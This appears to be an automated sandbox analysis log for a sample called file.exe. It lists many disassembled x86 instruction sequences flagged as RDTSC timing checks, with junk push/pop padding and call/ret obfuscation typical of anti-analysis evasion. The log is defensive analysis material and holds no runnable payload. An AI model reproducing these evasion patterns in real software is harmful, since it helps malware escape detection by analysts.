                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26E8C3 second address: 26E8E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E0C7B69Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edx 0x0000000c je 00007FB3E0C7B696h 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26F0AC second address: 26F0C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E96h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2713D3 second address: 2713D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27063C second address: 27065D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E92h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007FB3E1482E8Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 271141 second address: 271148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2713D7 second address: 27145B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FB3E1482E98h 0x0000000d nop 0x0000000e mov dword ptr [ebp+122D2EDBh], edx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007FB3E1482E88h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 mov edi, dword ptr [ebp+122D2A92h] 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push edi 0x0000003b call 00007FB3E1482E88h 0x00000040 pop edi 0x00000041 mov dword ptr [esp+04h], edi 0x00000045 add dword ptr [esp+04h], 0000001Bh 0x0000004d inc edi 0x0000004e push edi 0x0000004f ret 0x00000050 pop edi 0x00000051 ret 0x00000052 xchg eax, ebx 0x00000053 push eax 0x00000054 push edx 0x00000055 jno 00007FB3E1482E88h 0x0000005b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27065D second address: 270661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 270661 second address: 270667 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 273355 second address: 273360 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 278CEC second address: 278D2E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a jmp 00007FB3E1482E8Dh 0x0000000f jmp 00007FB3E1482E95h 0x00000014 pop ecx 0x00000015 push ecx 0x00000016 jmp 00007FB3E1482E93h 0x0000001b pop ecx 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 278D2E second address: 278D33 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 278D33 second address: 278D39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2792F2 second address: 2792F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2792F8 second address: 2792FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2792FC second address: 279313 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB3E0C7B696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007FB3E0C7B698h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27A387 second address: 27A38B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27A566 second address: 27A5F7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, dword ptr [ebp+122D29C2h] 0x00000010 push dword ptr fs:[00000000h] 0x00000017 stc 0x00000018 mov dword ptr fs:[00000000h], esp 0x0000001f push 00000000h 0x00000021 push ecx 0x00000022 call 00007FB3E0C7B698h 0x00000027 pop ecx 0x00000028 mov dword ptr [esp+04h], ecx 0x0000002c add dword ptr [esp+04h], 0000001Bh 0x00000034 inc ecx 0x00000035 push ecx 0x00000036 ret 0x00000037 pop ecx 0x00000038 ret 0x00000039 mov dword ptr [ebp+122D1E75h], edi 0x0000003f mov eax, dword ptr [ebp+122D0429h] 0x00000045 push 00000000h 0x00000047 push eax 0x00000048 call 00007FB3E0C7B698h 0x0000004d pop eax 0x0000004e mov dword ptr [esp+04h], eax 0x00000052 add dword ptr [esp+04h], 00000014h 0x0000005a inc eax 0x0000005b push eax 0x0000005c ret 0x0000005d pop eax 0x0000005e ret 0x0000005f jmp 00007FB3E0C7B6A4h 0x00000064 push FFFFFFFFh 0x00000066 mov dword ptr [ebp+1245F3DCh], eax 0x0000006c nop 0x0000006d push eax 0x0000006e push edx 0x0000006f je 00007FB3E0C7B69Ch 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27C4C3 second address: 27C4DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27A5F7 second address: 27A5FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27D427 second address: 27D42C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27D42C second address: 27D432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27E277 second address: 27E27D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27E27D second address: 27E2DB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB3E0C7B6A4h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D25EFh], edi 0x00000011 jmp 00007FB3E0C7B6A0h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007FB3E0C7B698h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 00000018h 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 push 00000000h 0x00000034 xchg eax, esi 0x00000035 je 00007FB3E0C7B6B2h 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27E2DB second address: 27E2FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E94h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27F349 second address: 27F35F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E0C7B69Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27F35F second address: 27F368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27F368 second address: 27F36C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 281596 second address: 2815C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB3E1482E93h 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2835E4 second address: 2835EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 283BEF second address: 283C71 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB3E1482E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FB3E1482E95h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007FB3E1482E88h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d mov edi, dword ptr [ebp+122D2A6Ah] 0x00000033 or ebx, dword ptr [ebp+122D294Ah] 0x00000039 push 00000000h 0x0000003b or bh, FFFFFFB1h 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push ebx 0x00000043 call 00007FB3E1482E88h 0x00000048 pop ebx 0x00000049 mov dword ptr [esp+04h], ebx 0x0000004d add dword ptr [esp+04h], 00000015h 0x00000055 inc ebx 0x00000056 push ebx 0x00000057 ret 0x00000058 pop ebx 0x00000059 ret 0x0000005a mov edi, dword ptr [ebp+122D1E82h] 0x00000060 push eax 0x00000061 push esi 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 284BF2 second address: 284BF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 284BF8 second address: 284BFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 280769 second address: 2807E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB3E0C7B69Bh 0x00000009 popad 0x0000000a pop edx 0x0000000b mov dword ptr [esp], eax 0x0000000e push dword ptr fs:[00000000h] 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007FB3E0C7B698h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D315Dh], ecx 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c mov bx, 8C84h 0x00000040 mov dword ptr [ebp+12470AB4h], ecx 0x00000046 mov eax, dword ptr [ebp+122D0589h] 0x0000004c push FFFFFFFFh 0x0000004e mov ebx, dword ptr [ebp+122D1D65h] 0x00000054 nop 0x00000055 jns 00007FB3E0C7B69Eh 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e jl 00007FB3E0C7B698h 0x00000064 push ebx 0x00000065 pop ebx 0x00000066 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 283DAC second address: 283DB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 284D32 second address: 284D4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E0C7B6A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 285D1B second address: 285D38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB3E1482E99h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 283DB0 second address: 283DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 284D4F second address: 284DB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E8Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push dword ptr fs:[00000000h] 0x00000013 and ebx, dword ptr [ebp+122D2B9Ah] 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 and bl, FFFFFFD9h 0x00000023 mov eax, dword ptr [ebp+122D0BC1h] 0x00000029 sbb bl, FFFFFFEBh 0x0000002c push FFFFFFFFh 0x0000002e nop 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 jmp 00007FB3E1482E95h 0x00000037 jmp 00007FB3E1482E99h 0x0000003c popad 0x0000003d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 286A7F second address: 286A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 283DB6 second address: 283DBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 284DB8 second address: 284DBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 286A88 second address: 286A8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 286A8C second address: 286B02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FB3E0C7B698h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 jmp 00007FB3E0C7B6A3h 0x00000029 push 00000000h 0x0000002b mov bl, 23h 0x0000002d mov edi, dword ptr [ebp+122D2D1Eh] 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007FB3E0C7B698h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 00000015h 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f mov ebx, dword ptr [ebp+1244CD81h] 0x00000055 push eax 0x00000056 push esi 0x00000057 push ecx 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 287AA8 second address: 287AFB instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB3E1482E88h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov bh, 85h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007FB3E1482E88h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b push 00000000h 0x0000002d mov ebx, dword ptr [ebp+122D57D5h] 0x00000033 xchg eax, esi 0x00000034 push edi 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FB3E1482E93h 0x0000003c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 286D91 second address: 286DA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB3E0C7B6A0h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 288AD4 second address: 288ADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 288ADB second address: 288B6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E0C7B6A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jne 00007FB3E0C7B6AFh 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007FB3E0C7B698h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebp 0x00000032 call 00007FB3E0C7B698h 0x00000037 pop ebp 0x00000038 mov dword ptr [esp+04h], ebp 0x0000003c add dword ptr [esp+04h], 0000001Ch 0x00000044 inc ebp 0x00000045 push ebp 0x00000046 ret 0x00000047 pop ebp 0x00000048 ret 0x00000049 and bx, 9661h 0x0000004e xchg eax, esi 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 push ecx 0x00000054 pop ecx 0x00000055 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 288B6A second address: 288B6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 288B6E second address: 288B74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 288B74 second address: 288B7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 288B7A second address: 288B7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2911E3 second address: 29121A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB3E1482E91h 0x00000009 jng 00007FB3E1482E86h 0x0000000f popad 0x00000010 pop esi 0x00000011 push eax 0x00000012 pushad 0x00000013 push edi 0x00000014 pop edi 0x00000015 jmp 00007FB3E1482E92h 0x0000001a push edx 0x0000001b pop edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 230281 second address: 2302C7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB3E0C7B696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FB3E0C7B69Eh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB3E0C7B6A1h 0x00000017 pushad 0x00000018 jmp 00007FB3E0C7B6A7h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2302C7 second address: 2302CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2302CC second address: 2302E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FB3E0C7B696h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jo 00007FB3E0C7B696h 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 290D42 second address: 290D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edi 0x00000007 pop edi 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop eax 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 290D51 second address: 290D67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E0C7B69Fh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2970C2 second address: 2970C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2970C8 second address: 2970E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jg 00007FB3E0C7B696h 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2970E2 second address: 29711A instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB3E1482E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push ebx 0x00000010 pushad 0x00000011 jmp 00007FB3E1482E92h 0x00000016 jmp 00007FB3E1482E8Bh 0x0000001b popad 0x0000001c pop ebx 0x0000001d mov eax, dword ptr [eax] 0x0000001f push ebx 0x00000020 pushad 0x00000021 push ebx 0x00000022 pop ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29711A second address: 297128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 231CC2 second address: 231CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29AD70 second address: 29AD75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29AD75 second address: 29AD7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29AD7A second address: 29AD80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29AD80 second address: 29AD91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FB3E1482E86h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29B6C6 second address: 29B6CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29B6CC second address: 29B6D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29BA93 second address: 29BA9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29BA9C second address: 29BAA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29BC65 second address: 29BC6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29BC6B second address: 29BC6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29BDD6 second address: 29BDE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB3E0C7B69Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 222D86 second address: 222DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB3E1482E99h 0x00000009 jc 00007FB3E1482E8Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
